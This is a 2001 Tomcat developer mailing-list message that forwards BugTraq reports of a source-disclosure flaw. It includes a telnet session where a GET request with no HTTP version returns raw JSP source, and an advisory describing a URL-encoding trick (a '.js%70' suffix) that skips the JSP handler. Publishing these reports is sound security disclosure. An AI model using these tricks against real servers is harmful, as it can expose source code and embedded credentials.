tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Craig R. McClanahan" <Craig.McClana...@eng.sun.com>
Subject [Fwd: Tomcat may reveal script source code by URL trickery]
Date Wed, 04 Apr 2001 16:08:48 GMT
Reported against Tomcat 3.2.1 on BugTraq.

Craig


Eric Daniel Mauricio wrote:

> There is another way to get the source from a jsp page using Tomcat.
>
> If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
> you will get the source code and not the jsp processed.
>
> In other words, use Apache + Tomcat if you intend to protect your source code.
>
> telnet maq106 8080
> Trying 10.0.0.106...
> Connected to maq106
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
> Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
> Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
>
> <!--
>   Copyright (c) 1999 The Apache Software Foundation.  All rights
>   reserved.
>
>   Number Guess Game
>   Written by Jason Hunter, CTO, K&A Software
>   http://www.servlets.com
> -->
>
> <%@ page import = "num.NumberGuessBean" %>
>
> <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
> <jsp:setProperty name="numguess" property="*"/>
>
> <html>
> <head><title>Number Guess</title></head>
> <body bgcolor="white">
> <font size=4>
>
> <% if (numguess.getSuccess()) { %>
>
>   Congratulations!  You got it.
>   And after just <%= numguess.getNumGuesses() %> tries.<p>
>
>   <% numguess.reset(); %>
>
>   Care to <a href="numguess.jsp">try again</a>?
>
> <% } else if (numguess.getNumGuesses() == 0) { %>
>
>   Welcome to the Number Guess game.<p>
>
>   I'm thinking of a number between 1 and 100.<p>
>
>   <form method=get>
>   What's your guess? <input type=text name=guess>
>   <input type=submit value="Submit">
>   </form>
>
> <% } else { %>
>
>   Good guess, but nope.  Try <b><%= numguess.getHint() %></b>.
>
>   You have made <%= numguess.getNumGuesses() %> guesses.<p>
>
>   I'm thinking of a number between 1 and 100.<p>
>
>   <form method=get>
>   What's your guess? <input type=text name=guess>
>   <input type=submit value="Submit">
>   </form>
>
> <% } %>
>
> </font>
> </body>
> </html>
> Connection closed by foreign host.
>
> [],
>
>    ericmau
>
> "Sverre H. Huseby" <shh@THATHOST.COM> escreveu:
>
> > Tomcat may reveal script source code by URL trickery
> > ----------------------------------------------------
> >
> > Sverre H. Huseby advisory 2001-03-29
> >
> >
> >
> > Systems affected
> > ----------------
> >
> > Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
> > tested.  Other versions may be vulnerable too.  The problem is only
> > present when using Tomcat's built in web server, not when using Tomcat
> > with Apache Web Server.
> >
> >
> > Description
> > -----------
> >
> > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> > Technologies, may be tricked into revealing the source code of JSP
> > scripts by using simple URL encoding.
> >
> >
> > Details
> > -------
> >
> > It seems that the built in web server in Tomcat does URL decoding in
> > an unreasonable order.  URLs like the following
> >
> >   http://XXX:8080/examples/jsp/num/numguess.js%70
> >
> > where %70 is an URL encoded 'p', returns the source code of index.jsp
> > rather than running the script on the server side.
> >
> > To speculate: The JSP handler is skipped as this URL does not end in
> > ".jsp", but the static file handler is nevertheless able to map the
> > URL into a correct file name.
> >
> >
> > Impact
> > ------
> >
> > This design error makes it possible to fetch the source code of JSP
> > scripts.  Such source code may contain database passwords and file
> > names, and may reveal design errors or programming bugs that make it
> > possible to further exploit the server or service.
> >
> >
> >
> > Reported by Sverre H. Huseby, shh@thathost.com
> >
> > --
> > <URL:mailto:shh@thathost.com>
> > <URL:http://shh.thathost.com/>
> >


Mime
View raw message